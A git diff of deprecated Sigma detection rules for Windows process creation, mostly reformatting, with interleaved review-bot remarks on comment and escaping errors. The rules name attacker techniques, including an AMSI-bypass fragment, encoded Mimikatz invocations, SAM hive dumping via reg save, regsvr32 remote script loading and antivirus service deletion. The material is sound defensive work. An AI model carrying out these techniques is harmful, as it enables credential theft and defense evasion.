@@ -20,11 +19,11 @@ detection: EventID: 4688 Channel: Security selection1: - CommandLine|contains|all: + CommandLine|contains|all: - '[Ref].Assembly.GetType' - SetValue($null,$true) - NonPublic,Static - NewProcessName|endswith: + NewProcessName|endswith: - \powershell.exe - \pwsh.exe - \powershell_ise.exe diff --git a/sigma/builtin/deprecated/proc_creation_win_powershell_base64_invoke_susp_cmdlets.yml b/sigma/builtin/deprecated/proc_creation_win_powershell_base64_invoke_susp_cmdlets.yml index bca607ab3..2f8e5e3c7 100644 --- a/sigma/builtin/deprecated/proc_creation_win_powershell_base64_invoke_susp_cmdlets.yml +++ b/sigma/builtin/deprecated/proc_creation_win_powershell_base64_invoke_susp_cmdlets.yml @@ -1,11 +1,10 @@ title: Malicious Base64 Encoded Powershell Invoke Cmdlets id: fd6e2919-3936-40c9-99db-0aa922c356f7 related: - - id: 6385697e-9f1b-40bd-8817-f4a91f40508e - type: similar + - id: 6385697e-9f1b-40bd-8817-f4a91f40508e + type: similar status: deprecated -description: Detects base64 encoded powershell cmdlet invocation of known suspicious - cmdlets +description: Detects base64 encoded powershell cmdlet invocation of known suspicious cmdlets references: - https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/ author: pH-T (Nextron Systems) @@ -24,13 +23,16 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: + # Invoke-BloodHound - SQBuAHYAbwBrAGUALQBCAGwAbwBvAGQASABvAHUAbgBkA - kAbgB2AG8AawBlAC0AQgBsAG8AbwBkAEgAbwB1AG4AZA - JAG4AdgBvAGsAZQAtAEIAbABvAG8AZABIAG8AdQBuAGQA + # Invoke-Mimikatz - SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA - kAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6A - JAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAeg + # Invoke-WMIExec - SQBuAHYAbwBrAGUALQBXAE0ASQBFAHgAZQBjA - kAbgB2AG8AawBlAC0AVwBNAEkARQB4AGUAYw - JAG4AdgBvAGsAZQAtAFcATQBJAEUAeABlAGMA 
diff --git a/sigma/builtin/deprecated/proc_creation_win_powershell_base64_listing_shadowcopy.yml b/sigma/builtin/deprecated/proc_creation_win_powershell_base64_listing_shadowcopy.yml index cdcda248c..1f5d86614 100644 --- a/sigma/builtin/deprecated/proc_creation_win_powershell_base64_listing_shadowcopy.yml +++ b/sigma/builtin/deprecated/proc_creation_win_powershell_base64_listing_shadowcopy.yml @@ -20,7 +20,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + # Win32_Shadowcopy | ForEach-Object + CommandLine|contains: - VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQAgAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQA - cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0A - XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5ACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdA diff --git a/sigma/builtin/deprecated/proc_creation_win_powershell_base64_shellcode.yml b/sigma/builtin/deprecated/proc_creation_win_powershell_base64_shellcode.yml index 5868a59a5..b62565a5e 100644 --- a/sigma/builtin/deprecated/proc_creation_win_powershell_base64_shellcode.yml +++ b/sigma/builtin/deprecated/proc_creation_win_powershell_base64_shellcode.yml @@ -18,7 +18,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - OiCAAAAYInlM - OiJAAAAYInlM condition: process_creation and selection diff --git a/sigma/builtin/deprecated/proc_creation_win_powershell_bitsjob.yml b/sigma/builtin/deprecated/proc_creation_win_powershell_bitsjob.yml index 1560f9109..5e4c46a95 100644 --- a/sigma/builtin/deprecated/proc_creation_win_powershell_bitsjob.yml +++ b/sigma/builtin/deprecated/proc_creation_win_powershell_bitsjob.yml @@ -20,8 +20,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: Start-BitsTransfer - NewProcessName|endswith: + CommandLine|contains: Start-BitsTransfer + NewProcessName|endswith: - \powershell.exe - \pwsh.exe condition: process_creation and selection 
diff --git a/sigma/builtin/deprecated/proc_creation_win_powershell_service_modification.yml b/sigma/builtin/deprecated/proc_creation_win_powershell_service_modification.yml index c0bd099a7..358f7499e 100644 --- a/sigma/builtin/deprecated/proc_creation_win_powershell_service_modification.yml +++ b/sigma/builtin/deprecated/proc_creation_win_powershell_service_modification.yml @@ -1,13 +1,9 @@ title: Stop Or Remove Antivirus Service id: 6783aa9e-0dc3-49d4-a94a-8b39c5fd700b status: deprecated -description: 'Detects usage of ''Stop-Service'' or ''Remove-Service'' powershell cmdlet - to disable AV services. - - Adversaries may disable security tools to avoid possible detection of their tools - and activities by stopping antivirus service - - ' +description: | + Detects usage of 'Stop-Service' or 'Remove-Service' powershell cmdlet to disable AV services. + Adversaries may disable security tools to avoid possible detection of their tools and activities by stopping antivirus service references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md - https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/ @@ -25,11 +21,12 @@ detection: EventID: 4688 Channel: Security selection_action: - CommandLine|contains: + CommandLine|contains: - 'Stop-Service ' - 'Remove-Service ' selection_product: - CommandLine|contains: + CommandLine|contains: + # Feel free to add more service name - ' McAfeeDLPAgentService' - ' Trend Micro Deep Security Manager' - ' TMBMServer' diff --git a/sigma/builtin/deprecated/proc_creation_win_powershell_xor_encoded_command.yml b/sigma/builtin/deprecated/proc_creation_win_powershell_xor_encoded_command.yml index 7c04b8b88..36826b2d0 100644 --- a/sigma/builtin/deprecated/proc_creation_win_powershell_xor_encoded_command.yml +++ b/sigma/builtin/deprecated/proc_creation_win_powershell_xor_encoded_command.yml 
@@ -1,12 +1,10 @@ title: Potential Xor Encoded PowerShell Command id: 5b572dcf-254b-425c-a8c5-d9af6bea35a6 related: - - id: cdf05894-89e7-4ead-b2b0-0a5f97a90f2f - type: similar + - id: cdf05894-89e7-4ead-b2b0-0a5f97a90f2f + type: similar status: deprecated -description: Detects usage of "xor" or "bxor" in combination of a "foreach" loop. - This pattern is often found in encoded powershell code and commands as a way to - avoid detection +description: Detects usage of "xor" or "bxor" in combination of a "foreach" loop. This pattern is often found in encoded powershell code and commands as a way to avoid detection references: - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65 author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton @@ -25,14 +23,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.exe - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.exe + - pwsh.dll selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ForEach - Xor condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/deprecated/proc_creation_win_reg_dump_sam.yml b/sigma/builtin/deprecated/proc_creation_win_reg_dump_sam.yml index c44d55ac3..a8388671b 100644 --- a/sigma/builtin/deprecated/proc_creation_win_reg_dump_sam.yml +++ b/sigma/builtin/deprecated/proc_creation_win_reg_dump_sam.yml 
@@ -1,12 +1,10 @@ title: Registry Dump of SAM Creds and Secrets id: 038cd51c-3ad8-41c5-ba8f-5d1c92f3cc1e related: - - id: fd877b94-9bb5-4191-bb25-d79cbd93c167 - type: similar + - id: fd877b94-9bb5-4191-bb25-d79cbd93c167 + type: similar status: deprecated -description: Adversaries may attempt to extract credential material from the Security - Account Manager (SAM) database either through Windows Registry where the SAM database - is stored +description: Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through Windows Registry where the SAM database is stored references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-1---registry-dump-of-sam-creds-and-secrets author: frack113 @@ -23,9 +21,9 @@ detection: EventID: 4688 Channel: Security selection_reg: - CommandLine|contains: ' save ' + CommandLine|contains: ' save ' selection_key: - CommandLine|contains: + CommandLine|contains: - HKLM\sam - HKLM\system - HKLM\security diff --git a/sigma/builtin/deprecated/proc_creation_win_regsvr32_anomalies.yml b/sigma/builtin/deprecated/proc_creation_win_regsvr32_anomalies.yml index 5ac7f8ddd..759fd565e 100644 --- a/sigma/builtin/deprecated/proc_creation_win_regsvr32_anomalies.yml +++ b/sigma/builtin/deprecated/proc_creation_win_regsvr32_anomalies.yml 
@@ -21,47 +21,47 @@ detection: EventID: 4688 Channel: Security selection1: - CommandLine|contains: \Temp\ - NewProcessName|endswith: \regsvr32.exe + CommandLine|contains: \Temp\ + NewProcessName|endswith: \regsvr32.exe selection2: - NewProcessName|endswith: \regsvr32.exe + NewProcessName|endswith: \regsvr32.exe ParentProcessName|endswith: - \powershell.exe - \pwsh.exe - \powershell_ise.exe selection3: - NewProcessName|endswith: \regsvr32.exe + NewProcessName|endswith: \regsvr32.exe ParentProcessName|endswith: \cmd.exe selection4a: - CommandLine|contains|all: + CommandLine|contains|all: - '/i:' - http - CommandLine|endswith: scrobj.dll - NewProcessName|endswith: \regsvr32.exe + CommandLine|endswith: scrobj.dll + NewProcessName|endswith: \regsvr32.exe selection4b: - CommandLine|contains|all: + CommandLine|contains|all: - '/i:' - ftp - CommandLine|endswith: scrobj.dll - NewProcessName|endswith: \regsvr32.exe + CommandLine|endswith: scrobj.dll + NewProcessName|endswith: \regsvr32.exe selection5: - NewProcessName|endswith: + NewProcessName|endswith: - \cscript.exe - \wscript.exe ParentProcessName|endswith: \regsvr32.exe selection6: - CommandLine|contains: '..\..\..\Windows\System32\regsvr32.exe ' - NewProcessName|endswith: \EXCEL.EXE + CommandLine|contains: '..\..\..\Windows\System32\regsvr32.exe ' + NewProcessName|endswith: \EXCEL.EXE selection7: ParentProcessName|endswith: \mshta.exe - NewProcessName|endswith: \regsvr32.exe + NewProcessName|endswith: \regsvr32.exe selection8: - CommandLine|contains: + CommandLine|contains: - \AppData\Local - C:\Users\Public - NewProcessName|endswith: \regsvr32.exe - selection9: - CommandLine|endswith: + NewProcessName|endswith: \regsvr32.exe + selection9: # suspicious extensions https://twitter.com/Max_Mal_/status/1542461200797163522/photo/3 + CommandLine|endswith: - .jpg - .jpeg - .png 
@@ -70,16 +70,16 @@ detection: - .tmp - .temp - .txt - NewProcessName|endswith: \regsvr32.exe + NewProcessName|endswith: \regsvr32.exe filter1: - CommandLine|contains: + CommandLine|contains: - \AppData\Local\Microsoft\Teams - \AppData\Local\WebEx\WebEx64\Meetings\atucfobj.dll filter2: - CommandLine|contains: \Program Files\Box\Box\Temp\ + CommandLine|contains: \Program Files\Box\Box\Temp\ ParentProcessName: C:\Program Files\Box\Box\FS\streem.exe filter_legitimate: - CommandLine|endswith: /s C:\Windows\System32\RpcProxy\RpcProxy.dll + CommandLine|endswith: /s C:\Windows\System32\RpcProxy\RpcProxy.dll condition: process_creation and (1 of selection* and not 1 of filter*) fields: - CommandLine diff --git a/sigma/builtin/deprecated/proc_creation_win_renamed_paexec.yml b/sigma/builtin/deprecated/proc_creation_win_renamed_paexec.yml index 3edf083c9..7923e73d0 100644 --- a/sigma/builtin/deprecated/proc_creation_win_renamed_paexec.yml +++ b/sigma/builtin/deprecated/proc_creation_win_renamed_paexec.yml @@ -1,8 +1,7 @@ title: Renamed PaExec Execution id: 7b0666ad-3e38-4e3d-9bab-78b06de85f7b status: deprecated -description: Detects execution of renamed paexec via imphash and executable product - string +description: Detects execution of renamed paexec via imphash and executable product string references: - sha256=01a461ad68d11b5b5096f45eb54df9ba62c5af413fa9eb544eacb598373a26bc - https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf 
@@ -24,19 +23,19 @@ detection: EventID: 4688 Channel: Security selection: - - Product|contains: PAExec - - Imphash: - - 11D40A7B7876288F919AB819CC2D9802 - - 6444f8a34e99b8f7d9647de66aabe516 - - dfd6aa3f7b2b1035b76b718f1ddc689f - - 1a6cca4d5460b1710a12dea39e4a592c - - Hashes|contains: - - IMPHASH=11D40A7B7876288F919AB819CC2D9802 - - IMPHASH=6444f8a34e99b8f7d9647de66aabe516 - - IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f - - IMPHASH=1a6cca4d5460b1710a12dea39e4a592c + - Product|contains: PAExec + - Imphash: + - 11D40A7B7876288F919AB819CC2D9802 + - 6444f8a34e99b8f7d9647de66aabe516 + - dfd6aa3f7b2b1035b76b718f1ddc689f + - 1a6cca4d5460b1710a12dea39e4a592c + - Hashes|contains: + - IMPHASH=11D40A7B7876288F919AB819CC2D9802 + - IMPHASH=6444f8a34e99b8f7d9647de66aabe516 + - IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f + - IMPHASH=1a6cca4d5460b1710a12dea39e4a592c filter: - NewProcessName|contains: paexec + NewProcessName|contains: paexec condition: process_creation and (selection and not filter) falsepositives: - Unknown diff --git a/sigma/builtin/deprecated/proc_creation_win_root_certificate_installed.yml b/sigma/builtin/deprecated/proc_creation_win_root_certificate_installed.yml index a3029c330..3de7a8d9e 100644 --- a/sigma/builtin/deprecated/proc_creation_win_root_certificate_installed.yml +++ b/sigma/builtin/deprecated/proc_creation_win_root_certificate_installed.yml 
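Review bot: The selection in this hunk keys entirely on `Product|contains`, `Imphash` and `Hashes|contains`, but the logsource it is pinned to (`EventID: 4688`, `Channel: Security`) does not carry product strings or hash fields as far as I know, so on this channel the selection cannot match and the rule is effectively inert. If the file is kept only as converted history, a comment above `selection:` stating that these fields are unavailable in Security 4688 events would save the next reader the analysis; otherwise the rule should be pointed at a log source that emits them. The indentation fix itself is fine.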
@@ -1,11 +1,10 @@ title: Root Certificate Installed id: 46591fae-7a4c-46ea-aec3-dff5e6d785dc related: - - id: 42821614-9264-4761-acfc-5772c3286f76 - type: derived + - id: 42821614-9264-4761-acfc-5772c3286f76 + type: derived status: deprecated -description: Adversaries may install a root certificate on a compromised system to - avoid warnings when connecting to adversary controlled web servers. +description: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md author: oscd.community, @redcanary, Zach Stanford @svch0st @@ -22,18 +21,17 @@ detection: EventID: 4688 Channel: Security selection1: - CommandLine|contains|all: + CommandLine|contains|all: - -addstore - root - NewProcessName|endswith: \certutil.exe + NewProcessName|endswith: \certutil.exe selection2: - CommandLine|contains|all: + CommandLine|contains|all: - /add - root - NewProcessName|endswith: \CertMgr.exe + NewProcessName|endswith: \CertMgr.exe condition: process_creation and (selection1 or selection2) falsepositives: - - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need - to test if GPO push doesn't trigger FP + - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP level: medium ruletype: Sigma diff --git a/sigma/builtin/deprecated/proc_creation_win_run_from_zip.yml b/sigma/builtin/deprecated/proc_creation_win_run_from_zip.yml index ce48f6428..90a1cad90 100644 --- a/sigma/builtin/deprecated/proc_creation_win_run_from_zip.yml +++ b/sigma/builtin/deprecated/proc_creation_win_run_from_zip.yml 
@@ -1,8 +1,7 @@ title: Run from a Zip File id: 1a70042a-6622-4a2b-8958-267625349abf status: deprecated -description: Payloads may be compressed, archived, or encrypted in order to avoid - detection +description: Payloads may be compressed, archived, or encrypted in order to avoid detection references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-4---execution-from-compressed-file author: frack113 @@ -19,7 +18,7 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|contains: .zip\ + NewProcessName|contains: .zip\ condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/deprecated/proc_creation_win_sc_delete_av_services.yml b/sigma/builtin/deprecated/proc_creation_win_sc_delete_av_services.yml index 38ce91753..d41ee86f3 100644 --- a/sigma/builtin/deprecated/proc_creation_win_sc_delete_av_services.yml +++ b/sigma/builtin/deprecated/proc_creation_win_sc_delete_av_services.yml @@ -1,8 +1,7 @@ title: Suspicious Execution of Sc to Delete AV Services id: 7fd4bb39-12d0-45ab-bb36-cebabc73dc7b status: deprecated -description: Detects when attackers use "sc.exe" to delete AV services from the system - in order to avoid detection +description: Detects when attackers use "sc.exe" to delete AV services from the system in order to avoid detection references: - https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955 author: Nasreddine Bencherchali (Nextron Systems) 
@@ -20,18 +19,21 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \sc.exe - - OriginalFileName: sc.exe + - NewProcessName|endswith: \sc.exe + - OriginalFileName: sc.exe selection_cli: - CommandLine|contains: ' delete ' + CommandLine|contains: ' delete ' selection_av_process: - CommandLine|contains: + CommandLine|contains: + # Delete Service 'AVG' - AvgAdminServer - AVG Antivirus - MBEndpointAgent + # Delete Service 'Malwarebytes' - MBAMService - MBCloudEA - avgAdminClient + # Delete Service 'Sophos' - SAVService - SAVAdminService - Sophos AutoUpdate Service @@ -54,11 +56,15 @@ detection: - Sophos Endpoint Defense Service - SophosFIM - swi_filter + # Delete Service 'FireBird' - FirebirdGuardianDefaultInstance - FirebirdServerDefaultInstance + # Delete Service 'Webroot' - WRSVC + # Delete Service 'ESET' - ekrn - ekrnEpsw + # Delete Service 'Kaspersky' - klim6 - AVP18.0.0 - KLIF @@ -71,6 +77,7 @@ detection: - klhk - KSDE1.0.0 - kltap + # Delete Service 'Quick Heal' - ScSecSvc - Core Mail Protection - Core Scanning Server @@ -79,11 +86,13 @@ detection: - RepairService - Core Browsing Protection - Quick Update Service + # Delete Service 'McAfee' - McAfeeFramework - macmnsvc - masvc - mfemms - mfevtp + # Delete Service 'Trend Micro' - TmFilter - TMLWCSService - tmusa @@ -98,6 +107,7 @@ detection: - ofcservice - TmPfw - PccNTUpd + # Delete Service 'Panda' - PandaAetherAgent - PSUAService - NanoServiceMain @@ -108,7 +118,6 @@ detection: - EPUpdateService condition: process_creation and (all of selection*) falsepositives: - - Legitimate software deleting using the same method of deletion (Add it to a - filter if you find cases as such) + - Legitimate software deleting using the same method of deletion (Add it to a filter if you find cases as such) level: high ruletype: Sigma 
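Review bot: The new vendor headings in the first hunk (`@@ -20,18 +19,21 @@`) do not line up with the entries beneath them: `MBEndpointAgent` sits under `# Delete Service 'AVG'` and `avgAdminClient` under `# Delete Service 'Malwarebytes'`, judging by the name prefixes. Since `CommandLine|contains` is an OR list, reordering has no detection impact: group `AvgAdminServer`, `AVG Antivirus` and `avgAdminClient` under the AVG heading and `MBEndpointAgent`, `MBAMService`, `MBCloudEA` under the Malwarebytes one. The later headings in the same file section (Sophos through Panda) appear consistent with their entries.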
diff --git a/sigma/builtin/deprecated/proc_creation_win_schtasks_user_temp.yml b/sigma/builtin/deprecated/proc_creation_win_schtasks_user_temp.yml index 58c7338ba..74de89438 100644 --- a/sigma/builtin/deprecated/proc_creation_win_schtasks_user_temp.yml +++ b/sigma/builtin/deprecated/proc_creation_win_schtasks_user_temp.yml @@ -18,13 +18,13 @@ detection: EventID: 4688 Channel: Security schtasks: - NewProcessName|endswith: \schtasks.exe + NewProcessName|endswith: \schtasks.exe option: - CommandLine|contains|all: + CommandLine|contains|all: - '/Create ' - \AppData\Local\Temp filter_klite_codec: - CommandLine|contains|all: + CommandLine|contains|all: - '/Create /TN "klcp_update" /XML ' - \klcp_update_task.xml condition: process_creation and (schtasks and option and not 1 of filter_*) diff --git a/sigma/builtin/deprecated/proc_creation_win_service_stop.yml b/sigma/builtin/deprecated/proc_creation_win_service_stop.yml index f2e7e4a42..8c760ed60 100644 --- a/sigma/builtin/deprecated/proc_creation_win_service_stop.yml +++ b/sigma/builtin/deprecated/proc_creation_win_service_stop.yml 
@@ -16,30 +16,29 @@ detection: EventID: 4688 Channel: Security selection_sc_net_img: - - OriginalFileName: - - sc.exe - - net.exe - - net1.exe - - NewProcessName|endswith: - - \sc.exe - - \net.exe - - \net1.exe + - OriginalFileName: + - sc.exe + - net.exe + - net1.exe + - NewProcessName|endswith: + - \sc.exe + - \net.exe + - \net1.exe selection_sc_net_cli: - CommandLine|contains: ' stop ' + CommandLine|contains: ' stop ' selection_pwsh: - CommandLine|contains: 'Stop-Service ' - NewProcessName|endswith: + CommandLine|contains: 'Stop-Service ' + NewProcessName|endswith: - \powershell.exe - \pwsh.exe filter: - CommandLine: - - sc stop KSCWebConsoleMessageQueue - - sc stop LGHUBUpdaterService - SubjectUserName|contains: + CommandLine: + - sc stop KSCWebConsoleMessageQueue # kaspersky Security Center Web Console double space between sc and stop + - sc stop LGHUBUpdaterService # Logitech LGHUB Updater Service + SubjectUserName|contains: # covers many language settings - AUTHORI - AUTORI - condition: process_creation and ((all of selection_sc_net* and not filter) or - selection_pwsh) + condition: process_creation and ((all of selection_sc_net* and not filter) or selection_pwsh) fields: - SubjectUserName - ComputerName diff --git a/sigma/builtin/deprecated/proc_creation_win_susp_bitstransfer.yml b/sigma/builtin/deprecated/proc_creation_win_susp_bitstransfer.yml index 0e2bd1768..6ea020f40 100644 --- a/sigma/builtin/deprecated/proc_creation_win_susp_bitstransfer.yml +++ b/sigma/builtin/deprecated/proc_creation_win_susp_bitstransfer.yml 
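Review bot: The new comment on the first filter entry states the Kaspersky command line has a double space between `sc` and `stop`, yet the value as rendered here, `sc stop KSCWebConsoleMessageQueue`, shows a single space. If the page collapsed the whitespace this is only cosmetic, but if the committed value really has one space the exact-match `CommandLine:` filter never suppresses that case and the comment is misleading, so the committed bytes are worth checking. A form that does not depend on spacing at all would be `CommandLine|contains:` with the two service names as values (alongside the existing `SubjectUserName|contains` clause), at the cost of a slightly broader exclusion.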
@@ -1,8 +1,7 @@ title: Suspicious Bitstransfer via PowerShell id: cd5c8085-4070-4e22-908d-a5b3342deb74 status: deprecated -description: Detects transferring files from system on a server bitstransfer Powershell - cmdlets +description: Detects transferring files from system on a server bitstransfer Powershell cmdlets references: - https://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps author: Austin Songer @austinsonger @@ -20,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - Get-BitsTransfer - Add-BitsFile - NewProcessName|endswith: + NewProcessName|endswith: - \powershell.exe - \powershell_ise.exe - \pwsh.exe diff --git a/sigma/builtin/deprecated/proc_creation_win_susp_cmd_exectution_via_wmi.yml b/sigma/builtin/deprecated/proc_creation_win_susp_cmd_exectution_via_wmi.yml index c759acaf8..7f71f3bf5 100644 --- a/sigma/builtin/deprecated/proc_creation_win_susp_cmd_exectution_via_wmi.yml +++ b/sigma/builtin/deprecated/proc_creation_win_susp_cmd_exectution_via_wmi.yml @@ -1,8 +1,7 @@ title: Suspicious Cmd Execution via WMI id: e31f89f7-36fb-4697-8ab6-48823708353b status: deprecated -description: Detects suspicious command execution (cmd) via Windows Management Instrumentation - (WMI) on a remote host. This could be indicative of adversary lateral movement. +description: Detects suspicious command execution (cmd) via Windows Management Instrumentation (WMI) on a remote host. This could be indicative of adversary lateral movement. references: - https://www.elastic.co/guide/en/security/current/suspicious-cmd-execution-via-wmi.html author: Tim Rauch 
@@ -19,11 +18,11 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: \\\\127.0.0.1\\ - NewProcessName|endswith: \cmd.exe + CommandLine|contains: \\\\127.0.0.1\\ + NewProcessName|endswith: \cmd.exe ParentProcessName|endswith: \WmiPrvSE.exe selection_opt: - CommandLine|contains: + CommandLine|contains: - 2>&1 - 1> condition: process_creation and (all of selection*) diff --git a/sigma/builtin/deprecated/proc_creation_win_susp_commandline_chars.yml b/sigma/builtin/deprecated/proc_creation_win_susp_commandline_chars.yml index 26103cc6d..ca6ecabd8 100644 --- a/sigma/builtin/deprecated/proc_creation_win_susp_commandline_chars.yml +++ b/sigma/builtin/deprecated/proc_creation_win_susp_commandline_chars.yml @@ -1,8 +1,7 @@ title: Suspicious Characters in CommandLine id: 2c0d2d7b-30d6-4d14-9751-7b9113042ab9 status: deprecated -description: Detects suspicious Unicode characters in the command line, which could - be a sign of obfuscation or defense evasion +description: Detects suspicious Unicode characters in the command line, which could be a sign of obfuscation or defense evasion references: - https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation author: Florian Roth (Nextron Systems) @@ -18,18 +17,18 @@ detection: EventID: 4688 Channel: Security selection_spacing_modifiers: - CommandLine|contains: - - "\u02E3" - - "\u02EA" - - "\u02E2" - selection_unicode_slashes: - CommandLine|contains: - - "\u2215" - - "\u2044" - selection_unicode_hyphens: - CommandLine|contains: - - "\u2015" - - "\u2014" + CommandLine|contains: # spacing modifier letters that get auto-replaced + - ˣ # 0x02E3 + - ˪ # 0x02EA + - ˢ # 0x02E2 + selection_unicode_slashes: # forward slash alternatives + CommandLine|contains: + - ∕ # 0x22FF + - ⁄ # 0x206F + selection_unicode_hyphens: # hyphen alternatives + CommandLine|contains: + - ― # 0x2015 + - — # 0x2014 condition: process_creation and (1 of selection*) falsepositives: - Unknown 
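Review bot: The code-point comments on the two slash entries are wrong: the removed lines show these were `\u2215` (DIVISION SLASH) and `\u2044` (FRACTION SLASH), but the new comments say `# 0x22FF` and `# 0x206F`, which are different code points. They should read `- ∕ # 0x2215` and `- ⁄ # 0x2044` so the comment can be checked against the glyph. Replacing the `\uXXXX` escapes with raw characters also means every tool that rewrites this file must preserve UTF-8 exactly; these glyphs look almost identical to ASCII `/` and `-`, so a silent normalisation would not be noticed by eye, and an accurate hex comment is the only cheap way to catch it. The spacing-modifier and hyphen comments do match their removed escapes.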
diff --git a/sigma/builtin/deprecated/proc_creation_win_susp_lolbin_non_c_drive.yml b/sigma/builtin/deprecated/proc_creation_win_susp_lolbin_non_c_drive.yml index b824f4e5f..cb7b132a3 100644 --- a/sigma/builtin/deprecated/proc_creation_win_susp_lolbin_non_c_drive.yml +++ b/sigma/builtin/deprecated/proc_creation_win_susp_lolbin_non_c_drive.yml @@ -1,8 +1,7 @@ title: Wscript Execution from Non C Drive id: 5b80cf53-3a46-4adc-960b-05ec19348d74 status: deprecated -description: Detects Wscript or Cscript executing from a drive other than C. This - has been observed with Qakbot executing from within a mounted ISO file. +description: Detects Wscript or Cscript executing from a drive other than C. This has been observed with Qakbot executing from within a mounted ISO file. references: - https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB_30.09.2022.txt - https://app.any.run/tasks/4985c746-601e-401a-9ccf-ae350ac2e887/ @@ -20,25 +19,25 @@ detection: EventID: 4688 Channel: Security selection_lolbin: - NewProcessName|endswith: + NewProcessName|endswith: - \wscript.exe - \cscript.exe selection_exetensions: - CommandLine|contains: + CommandLine|contains: - .js - .vbs - .vbe selection_drive_path: - CommandLine|contains: :\ + CommandLine|contains: :\ filter_drive_path: - CommandLine|contains: + CommandLine|contains: - ' C:\\' - - ' ''C:\' + - " 'C:\\" - ' "C:\\' filter_env_vars: - CommandLine|contains: '%' + CommandLine|contains: '%' filter_unc_paths: - CommandLine|contains: ' \\\\' + CommandLine|contains: ' \\\\' condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - Legitimate scripts located on other partitions such as "D:" diff --git a/sigma/builtin/deprecated/proc_creation_win_susp_run_folder.yml b/sigma/builtin/deprecated/proc_creation_win_susp_run_folder.yml index f15547ab0..4509714ea 100644 --- a/sigma/builtin/deprecated/proc_creation_win_susp_run_folder.yml +++ b/sigma/builtin/deprecated/proc_creation_win_susp_run_folder.yml 
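Review bot: The three `filter_drive_path` entries now use two different backslash encodings: `' C:\\'` and `' "C:\\'` are single-quoted, so YAML keeps both backslashes, while the rewritten `" 'C:\\"` is double-quoted, so YAML reduces it to a single backslash. Whether all three then match the same command lines depends on how the rule engine treats `\` versus `\\`; if the sibling entries' two-backslash form is the intended one, the rewritten entry should be `- " 'C:\\\\"` so that all three decode identically. Either way, a one-line comment stating the convention, e.g. `# each entry must decode to the same literal backslash sequence after YAML and rule escaping`, would stop the next edit from re-introducing the mismatch.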
@@ -1,8 +1,7 @@ title: Process Start From Suspicious Folder id: dca91cfd-d7ab-4c66-8da7-ee57d487b35b status: deprecated -description: Detects process start from rare or uncommon folders like temporary folder - or folders that usually don't contain executable files +description: Detects process start from rare or uncommon folders like temporary folder or folders that usually don't contain executable files references: - Malware sandbox results author: frack113 @@ -19,24 +18,23 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|contains: + NewProcessName|contains: - \Desktop\ - \Temp\ - \Temporary Internet filter_parent: - - ParentProcessName: - - C:\Windows\System32\cleanmgr.exe - - C:\Program Files (x86)\Microsoft Visual Studio\Installer\resources\app\ServiceHub\Services\Microsoft.VisualStudio.Setup.Service\BackgroundDownload.exe - - C:\Windows\System32\dxgiadaptercache.exe - - ParentProcessName|startswith: C:\Program Files (x86)\NVIDIA Corporation\ + - ParentProcessName: + - C:\Windows\System32\cleanmgr.exe + - C:\Program Files (x86)\Microsoft Visual Studio\Installer\resources\app\ServiceHub\Services\Microsoft.VisualStudio.Setup.Service\BackgroundDownload.exe + - C:\Windows\System32\dxgiadaptercache.exe + - ParentProcessName|startswith: C:\Program Files (x86)\NVIDIA Corporation\ filter_other: - NewProcessName|endswith: setup.exe + NewProcessName|endswith: setup.exe filter_edge: - NewProcessName|startswith: C:\Program Files 